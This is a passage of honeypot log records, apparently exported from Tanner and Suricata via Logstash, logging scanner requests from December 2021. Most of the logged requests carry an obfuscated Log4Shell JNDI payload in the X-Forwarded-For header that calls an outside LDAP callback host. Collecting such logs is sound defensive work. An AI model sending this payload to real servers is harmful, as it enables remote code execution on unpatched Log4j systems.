""2021-12-15T10:14:16.851935""}",,,,,,GET,,,,,,"/",,,,,,,,,,,index,1,1,"0.6.0","c83c0473-d7ec-490a-9aa5-a83be9b2c40d","0.6.0",,,,,,,,,,,,,,,,,,"138.197.151.200",57206,,,,,,,,,200,,,disturbedyoung,"172.16.0.42","172.16.0.42","[""tanner"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T10:14:16.851935",,,,,,,,,Tanner,,,"34ab2d23-6507-4c8d-988a-924b97e5c33c",
"2021-12-15T09:47:48.409Z",1,"x7Z9vX0BCXMCNTQLyU-e","logstash-suricata-2021.12.15",,"_doc","6a7feb4e-8d38-404a-b593-c85d16dfcf9a",08795fcc3b5e,"3f34f6f9-e3f7-4aea-9bba-8eec20d6197a",08795fcc3b5e,filebeat,"7.11.1",,,,,,,,,,,,,,,,http,,,,,,"159.65.110.144",58394,,,"1.6.0",,fileinfo,,,,,,,,,,,,,,,,,,,,,,,"/favicon.ico",false,"HTML document, ASCII text, with very long lines (1488)",51cdc5a4827fd0f112758593f673c970,"[]",10424,CLOSED,false,1,,,,,,,1208688518098237,"Digital Ocean, Inc.",14061,Amsterdam,EU,NL,NL,Netherlands,,"172.16.0.42","52.352","{""lon"":4.9392,""lat"":52.352}","4.9392",1098,NH,"North Holland","Europe/Amsterdam",,,,,,,,,,,,,,,08795fcc3b5e,,,,,"172.16.0.42","text/html",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",10424,"HTTP/1.1",200,"/favicon.ico",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",16794418,,"{""timestamp"":""2021-12-15T09:47:48.409963+0000"",""flow_id"":1208688518098237,""in_iface"":""eth0"",""event_type"":""fileinfo"",""src_ip"":""172.16.0.42"",""src_port"":80,""dest_ip"":""159.65.110.144"",""dest_port"":58394,""proto"":""TCP"",""http"":{""hostname"":""172.16.0.42"",""url"":""/favicon.ico"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""text/html"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":10424},""app_proto"":""http"",""fileinfo"":{""filename"":""/favicon.ico"",""sid"":[],""magic"":""HTML document, ASCII text, with very long lines (1488)"",""gaps"":false,""state"":""CLOSED"",""md5"":""51cdc5a4827fd0f112758593f673c970"",""stored"":false,""size"":10424,""tx_id"":1}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,,,,,,,,,,pastikebana,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T09:47:48.409963+0000",,,,,,,,,Suricata,,,,
"2021-12-15T09:47:48.409Z",1,"xrZ9vX0BCXMCNTQLyU-e","logstash-suricata-2021.12.15",,"_doc","6a7feb4e-8d38-404a-b593-c85d16dfcf9a",08795fcc3b5e,"3f34f6f9-e3f7-4aea-9bba-8eec20d6197a",08795fcc3b5e,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,1208688518098237,,,"Santa Clara",NA,US,US,"United States",807,"159.65.110.144","37.3417","{""lon"":-121.9753,""lat"":37.3417}","-121.9753",95051,CA,California,"America/Los_Angeles",,,,,,,,,,,,,,,08795fcc3b5e,"gzip, deflate",,,,"172.16.0.42","text/html",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",10424,"HTTP/1.1",200,"/favicon.ico",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",16793765,,"{""timestamp"":""2021-12-15T09:47:48.409963+0000"",""flow_id"":1208688518098237,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""159.65.110.144"",""src_port"":58394,""dest_ip"":""172.16.0.42"",""dest_port"":80,""proto"":""TCP"",""tx_id"":1,""http"":{""hostname"":""172.16.0.42"",""url"":""/favicon.ico"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""text/html"",""accept_encoding"":""gzip, deflate"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":10424}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"159.65.110.144",58394,,,,,,,,,,,,pastikebana,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-15T09:47:48.409963+0000",,,,,,,,1,Suricata,,,,
"2021-12-15T09:47:48.221Z",1,OSJ9vX0B5e7x5EYnqwC8,"logstash-tanner-2021.12.15",,"_doc","6a7feb4e-8d38-404a-b593-c85d16dfcf9a",08795fcc3b5e,"3f34f6f9-e3f7-4aea-9bba-8eec20d6197a",08795fcc3b5e,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,"fff897f1-6e81-4c4d-839a-ea4338fcc2bf",,80,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"Santa Clara",NA,US,US,"United States",807,"159.65.110.144","37.3417","{""lon"":-121.9753,""lat"":37.3417}","-121.9753",95051,CA,California,"America/Los_Angeles",,,,"*/*","gzip, deflate",,,"keep-alive","sess_uuid=fff897f1-6e81-4c4d-839a-ea4338fcc2bf",,"172.16.0.42",,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36","${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",08795fcc3b5e,,,,,,,,,,,,,,,,,,,,,,,,log,,,,,,,,"/data/tanner/log/tanner_report.json",31970,,"{""method"": ""GET"", ""path"": ""/favicon.ico"", ""headers"": {""host"": ""172.16.0.42"", ""user-agent"": ""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"", ""accept-encoding"": ""gzip, deflate"", ""accept"": ""*/*"", ""connection"": ""keep-alive"", ""x-forwarded-for"": ""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"", ""cookie"": ""sess_uuid=fff897f1-6e81-4c4d-839a-ea4338fcc2bf""}, ""uuid"": ""fe5599e2-554b-4b31-a6bd-c7e6ff032349"", ""peer"": {""ip"": ""159.65.110.144"", ""port"": 58394}, ""status"": 200, ""cookies"": {""sess_uuid"": ""fff897f1-6e81-4c4d-839a-ea4338fcc2bf""}, ""response_msg"": {""version"": ""0.6.0"", ""response"": {""message"": {""detection"": {""name"": ""index"", ""order"": 1, ""type"": 1, ""version"": ""0.6.0""}, ""sess_uuid"": ""bd8e2b64-8308-4aef-9a31-c2822a20c67d""}}}, ""timestamp"": ""2021-12-15T09:47:48.221780""}",,,,,,GET,,,,,,"/favicon.ico",,,,,,,,,,,index,1,1,"0.6.0","bd8e2b64-8308-4aef-9a31-c2822a20c67d","0.6.0",,,,,,,,,,,,,,,,,,"159.65.110.144",58394,,,,,,,,,200,,,pastikebana,"172.16.0.42","172.16.0.42","[""tanner"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-15T09:47:48.221780",,,,,,,,,Tanner,,,"fe5599e2-554b-4b31-a6bd-c7e6ff032349",
"2021-12-15T09:47:47.571Z",1,"xbZ9vX0BCXMCNTQLyU-e","logstash-suricata-2021.12.15",,"_doc","6a7feb4e-8d38-404a-b593-c85d16dfcf9a",08795fcc3b5e,"3f34f6f9-e3f7-4aea-9bba-8eec20d6197a",08795fcc3b5e,filebeat,"7.11.1",,,,,,,,,,,,,,,,http,,,,,,"159.65.110.144",58394,,,"1.6.0",,fileinfo,,,,,,,,,,,,,,,,,,,,,,,"/",false,"HTML document, ASCII text, with very long lines (1673)",c9c65774fd2401c660a14616a73a1890,"[]",13383,CLOSED,false,0,,,,,,,1208688518098237,"Digital Ocean, Inc.",14061,Amsterdam,EU,NL,NL,Netherlands,,"172.16.0.42","52.352","{""lon"":4.9392,""lat"":52.352}","4.9392",1098,NH,"North Holland","Europe/Amsterdam",,,,,,,,,,,,,,,08795fcc3b5e,,,,,"172.16.0.42","text/html",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",13383,"HTTP/1.1",200,"/",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",16792933,,"{""timestamp"":""2021-12-15T09:47:47.571015+0000"",""flow_id"":1208688518098237,""in_iface"":""eth0"",""event_type"":""fileinfo"",""src_ip"":""172.16.0.42"",""src_port"":80,""dest_ip"":""159.65.110.144"",""dest_port"":58394,""proto"":""TCP"",""http"":{""hostname"":""172.16.0.42"",""url"":""/"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""text/html"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":13383},""app_proto"":""http"",""fileinfo"":{""filename"":""/"",""sid"":[],""magic"":""HTML document, ASCII text, with very long lines (1673)"",""gaps"":false,""state"":""CLOSED"",""md5"":""c9c65774fd2401c660a14616a73a1890"",""stored"":false,""size"":13383,""tx_id"":0}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,,,,,,,,,,pastikebana,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T09:47:47.571015+0000",,,,,,,,,Suricata,,,,
"2021-12-15T09:47:47.571Z",1,"xLZ9vX0BCXMCNTQLyU-e","logstash-suricata-2021.12.15",,"_doc","6a7feb4e-8d38-404a-b593-c85d16dfcf9a",08795fcc3b5e,"3f34f6f9-e3f7-4aea-9bba-8eec20d6197a",08795fcc3b5e,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,1208688518098237,,,"Santa Clara",NA,US,US,"United States",807,"159.65.110.144","37.3417","{""lon"":-121.9753,""lat"":37.3417}","-121.9753",95051,CA,California,"America/Los_Angeles",,,,,,,,,,,,,,,08795fcc3b5e,"gzip, deflate",,,,"172.16.0.42","text/html",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",13383,"HTTP/1.1",200,"/",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",16792291,,"{""timestamp"":""2021-12-15T09:47:47.571015+0000"",""flow_id"":1208688518098237,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""159.65.110.144"",""src_port"":58394,""dest_ip"":""172.16.0.42"",""dest_port"":80,""proto"":""TCP"",""tx_id"":0,""http"":{""hostname"":""172.16.0.42"",""url"":""/"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""text/html"",""accept_encoding"":""gzip, deflate"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":13383}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"159.65.110.144",58394,,,,,,,,,,,,pastikebana,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-15T09:47:47.571015+0000",,,,,,,,0,Suricata,,,,
"2021-12-15T09:47:47.225Z",1,OCJ9vX0B5e7x5EYnqwC8,"logstash-tanner-2021.12.15",,"_doc","6a7feb4e-8d38-404a-b593-c85d16dfcf9a",08795fcc3b5e,"3f34f6f9-e3f7-4aea-9bba-8eec20d6197a",08795fcc3b5e,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,,80,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"Santa Clara",NA,US,US,"United States",807,"159.65.110.144","37.3417","{""lon"":-121.9753,""lat"":37.3417}","-121.9753",95051,CA,California,"America/Los_Angeles",,,,"*/*","gzip, deflate",,,"keep-alive",,,"172.16.0.42",,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36","${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",08795fcc3b5e,,,,,,,,,,,,,,,,,,,,,,,,log,,,,,,,,"/data/tanner/log/tanner_report.json",31191,,"{""method"": ""GET"", ""path"": ""/"", ""headers"": {""host"": ""172.16.0.42"", ""user-agent"": ""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"", ""accept-encoding"": ""gzip, deflate"", ""accept"": ""*/*"", ""connection"": ""keep-alive"", ""x-forwarded-for"": ""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}""}, ""uuid"": ""fe5599e2-554b-4b31-a6bd-c7e6ff032349"", ""peer"": {""ip"": ""159.65.110.144"", ""port"": 58394}, ""status"": 200, ""cookies"": {""sess_uuid"": null}, ""response_msg"": {""version"": ""0.6.0"", ""response"": {""message"": {""detection"": {""name"": ""index"", ""order"": 1, ""type"": 1, ""version"": ""0.6.0""}, ""sess_uuid"": ""fff897f1-6e81-4c4d-839a-ea4338fcc2bf""}}}, ""timestamp"": ""2021-12-15T09:47:47.225651""}",,,,,,GET,,,,,,"/",,,,,,,,,,,index,1,1,"0.6.0","fff897f1-6e81-4c4d-839a-ea4338fcc2bf","0.6.0",,,,,,,,,,,,,,,,,,"159.65.110.144",58394,,,,,,,,,200,,,pastikebana,"172.16.0.42","172.16.0.42","[""tanner"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-15T09:47:47.225651",,,,,,,,,Tanner,,,"fe5599e2-554b-4b31-a6bd-c7e6ff032349",
"2021-12-15T08:56:53.651Z",1,yyBPvX0B5e7x5EYnEj90,"logstash-suricata-2021.12.15",,"_doc","13aa9408-322c-43ae-a814-ed98938bd3a7",30ccdadf8271,"50457cf1-59c1-4d07-9e33-609c2c14ae5f",30ccdadf8271,filebeat,"7.11.1",,,,,,,,,,,,,,,,http,,,,,,"143.198.163.225",54014,,,"1.6.0",,fileinfo,,,,,,,,,,,,,,,,,,,,,,,"/favicon.ico",false,"MS Windows icon resource - 3 icons, 16x16, 32 bits/pixel, 24x24, 32 bits/pixel",d316e1622c58825727e7e4e6c954d289,"[]",7886,CLOSED,false,2,,,,,,,239833890074467,,,"Frankfurt am Main",EU,DE,DE,Germany,,"172.16.0.42","50.1155","{""lon"":8.6842,""lat"":50.1155}","8.6842",60313,HE,Hesse,"Europe/Berlin",,,,,,,,,,,,,,,30ccdadf8271,,,,,"172.16.0.42","image/x-icon",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",7886,"HTTP/1.1",200,"/favicon.ico?1528612569",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",7877848,,"{""timestamp"":""2021-12-15T08:56:53.651455+0000"",""flow_id"":239833890074467,""in_iface"":""eth0"",""event_type"":""fileinfo"",""src_ip"":""172.16.0.42"",""src_port"":80,""dest_ip"":""143.198.163.225"",""dest_port"":54014,""proto"":""TCP"",""http"":{""hostname"":""172.16.0.42"",""url"":""/favicon.ico?1528612569"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""image/x-icon"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":7886},""app_proto"":""http"",""fileinfo"":{""filename"":""/favicon.ico"",""sid"":[],""magic"":""MS Windows icon resource - 3 icons, 16x16, 32 bits/pixel, 24x24, 32 bits/pixel"",""gaps"":false,""state"":""CLOSED"",""md5"":""d316e1622c58825727e7e4e6c954d289"",""stored"":false,""size"":7886,""tx_id"":2}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,,,,,,,,,,satisfiedweakness,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-15T08:56:53.651455+0000",,,,,,,,,Suricata,,,,
"2021-12-15T08:56:53.651Z",1,yiBPvX0B5e7x5EYnEj90,"logstash-suricata-2021.12.15",,"_doc","13aa9408-322c-43ae-a814-ed98938bd3a7",30ccdadf8271,"50457cf1-59c1-4d07-9e33-609c2c14ae5f",30ccdadf8271,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,239833890074467,"XO Communications",2828,,NA,US,US,"United States",,"143.198.163.225","37.751","{""lon"":-97.822,""lat"":37.751}","-97.822",,,,"America/Chicago",,,,,,,,,,,,,,,30ccdadf8271,"gzip, deflate",,,,"172.16.0.42","image/x-icon",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",7886,"HTTP/1.1",200,"/favicon.ico?1528612569",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",7877186,,"{""timestamp"":""2021-12-15T08:56:53.651455+0000"",""flow_id"":239833890074467,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""143.198.163.225"",""src_port"":54014,""dest_ip"":""172.16.0.42"",""dest_port"":80,""proto"":""TCP"",""tx_id"":2,""http"":{""hostname"":""172.16.0.42"",""url"":""/favicon.ico?1528612569"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""image/x-icon"",""accept_encoding"":""gzip, deflate"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":7886}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"143.198.163.225",54014,,,,,,,,,,,,satisfiedweakness,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T08:56:53.651455+0000",,,,,,,,2,Suricata,,,,
"2021-12-15T08:56:53.552Z",1,GiBPvX0B5e7x5EYnIEBk,"logstash-tanner-2021.12.15",,"_doc","13aa9408-322c-43ae-a814-ed98938bd3a7",30ccdadf8271,"50457cf1-59c1-4d07-9e33-609c2c14ae5f",30ccdadf8271,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,"91c333a6-1f03-4909-a6d0-c0546fee1053",,80,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"XO Communications",2828,,NA,US,US,"United States",,"143.198.163.225","37.751","{""lon"":-97.822,""lat"":37.751}","-97.822",,,,"America/Chicago",,,,"*/*","gzip, deflate",,,"keep-alive","sess_uuid=91c333a6-1f03-4909-a6d0-c0546fee1053",,"172.16.0.42",,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36","${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",30ccdadf8271,,,,,,,,,,,,,,,,,,,,,,,,log,,,,,,,,"/data/tanner/log/tanner_report.json",63021,,"{""method"": ""GET"", ""path"": ""/favicon.ico?1528612569"", ""headers"": {""host"": ""172.16.0.42"", ""user-agent"": ""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"", ""accept-encoding"": ""gzip, deflate"", ""accept"": ""*/*"", ""connection"": ""keep-alive"", ""x-forwarded-for"": ""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"", ""cookie"": ""sess_uuid=91c333a6-1f03-4909-a6d0-c0546fee1053""}, ""uuid"": ""e0c7db10-9902-420a-b2f0-cef9df043cf3"", ""peer"": {""ip"": ""143.198.163.225"", ""port"": 54014}, ""status"": 200, ""cookies"": {""sess_uuid"": ""91c333a6-1f03-4909-a6d0-c0546fee1053""}, ""response_msg"": {""version"": ""0.6.0"", ""response"": {""message"": {""detection"": {""name"": ""index"", ""order"": 1, ""type"": 1, ""version"": ""0.6.0""}, ""sess_uuid"": ""812fb158-2314-46e9-9419-e410af63f39c""}}}, ""timestamp"": ""2021-12-15T08:56:53.552407""}",,,,,,GET,,,,,,"/favicon.ico?1528612569",,,,,,,,,,,index,1,1,"0.6.0","812fb158-2314-46e9-9419-e410af63f39c","0.6.0",,,,,,,,,,,,,,,,,,"143.198.163.225",54014,,,,,,,,,200,,,satisfiedweakness,"172.16.0.42","172.16.0.42","[""tanner"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T08:56:53.552407",,,,,,,,,Tanner,,,"e0c7db10-9902-420a-b2f0-cef9df043cf3",
"2021-12-15T08:56:52.595Z",1,"-LRPvX0BCXMCNTQLDpV_","logstash-suricata-2021.12.15",,"_doc","13aa9408-322c-43ae-a814-ed98938bd3a7",30ccdadf8271,"50457cf1-59c1-4d07-9e33-609c2c14ae5f",30ccdadf8271,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,239833890074467,"XO Communications",2828,,NA,US,US,"United States",,"143.198.163.225","37.751","{""lon"":-97.822,""lat"":37.751}","-97.822",,,,"America/Chicago",,,,,,,,,,,,,,,30ccdadf8271,"gzip, deflate",,,,"172.16.0.42","text/html",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",446,"HTTP/1.1",404,"/favicon.ico",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",7874967,,"{""timestamp"":""2021-12-15T08:56:52.595714+0000"",""flow_id"":239833890074467,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""143.198.163.225"",""src_port"":54014,""dest_ip"":""172.16.0.42"",""dest_port"":80,""proto"":""TCP"",""tx_id"":1,""http"":{""hostname"":""172.16.0.42"",""url"":""/favicon.ico"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""text/html"",""accept_encoding"":""gzip, deflate"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":404,""length"":446}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"143.198.163.225",54014,,,,,,,,,,,,satisfiedweakness,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T08:56:52.595714+0000",,,,,,,,1,Suricata,,,,
"2021-12-15T08:56:52.595Z",1,t4NPvX0B6VkG8jKzDgWA,"logstash-suricata-2021.12.15",,"_doc","13aa9408-322c-43ae-a814-ed98938bd3a7",30ccdadf8271,"50457cf1-59c1-4d07-9e33-609c2c14ae5f",30ccdadf8271,filebeat,"7.11.1",,,,,,,,,,,,,,,,http,,,,,,"143.198.163.225",54014,,,"1.6.0",,fileinfo,,,,,,,,,,,,,,,,,,,,,,,"/favicon.ico",false,"HTML document, ASCII text",27a505e858e000b7a478dfde26bf8378,"[]",446,CLOSED,false,1,,,,,,,239833890074467,,,"Frankfurt am Main",EU,DE,DE,Germany,,"172.16.0.42","50.1155","{""lon"":8.6842,""lat"":50.1155}","8.6842",60313,HE,Hesse,"Europe/Berlin",,,,,,,,,,,,,,,30ccdadf8271,,,,,"172.16.0.42","text/html",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",446,"HTTP/1.1",404,"/favicon.ico",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",7875614,,"{""timestamp"":""2021-12-15T08:56:52.595714+0000"",""flow_id"":239833890074467,""in_iface"":""eth0"",""event_type"":""fileinfo"",""src_ip"":""172.16.0.42"",""src_port"":80,""dest_ip"":""143.198.163.225"",""dest_port"":54014,""proto"":""TCP"",""http"":{""hostname"":""172.16.0.42"",""url"":""/favicon.ico"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""text/html"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":404,""length"":446},""app_proto"":""http"",""fileinfo"":{""filename"":""/favicon.ico"",""sid"":[],""magic"":""HTML document, ASCII text"",""gaps"":false,""state"":""CLOSED"",""md5"":""27a505e858e000b7a478dfde26bf8378"",""stored"":false,""size"":446,""tx_id"":1}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,,,,,,,,,,satisfiedweakness,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-15T08:56:52.595714+0000",,,,,,,,,Suricata,,,,
"2021-12-15T08:56:52.504Z",1,GSBPvX0B5e7x5EYnIEBk,"logstash-tanner-2021.12.15",,"_doc","13aa9408-322c-43ae-a814-ed98938bd3a7",30ccdadf8271,"50457cf1-59c1-4d07-9e33-609c2c14ae5f",30ccdadf8271,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,"91c333a6-1f03-4909-a6d0-c0546fee1053",,80,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"XO Communications",2828,,NA,US,US,"United States",,"143.198.163.225","37.751","{""lon"":-97.822,""lat"":37.751}","-97.822",,,,"America/Chicago",,,,"*/*","gzip, deflate",,,"keep-alive","sess_uuid=91c333a6-1f03-4909-a6d0-c0546fee1053",,"172.16.0.42",,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36","${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",30ccdadf8271,,,,,,,,,,,,,,,,,,,,,,,,log,,,,,,,,"/data/tanner/log/tanner_report.json",62138,,"{""method"": ""GET"", ""path"": ""/favicon.ico"", ""headers"": {""host"": ""172.16.0.42"", ""user-agent"": ""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"", ""accept-encoding"": ""gzip, deflate"", ""accept"": ""*/*"", ""connection"": ""keep-alive"", ""x-forwarded-for"": 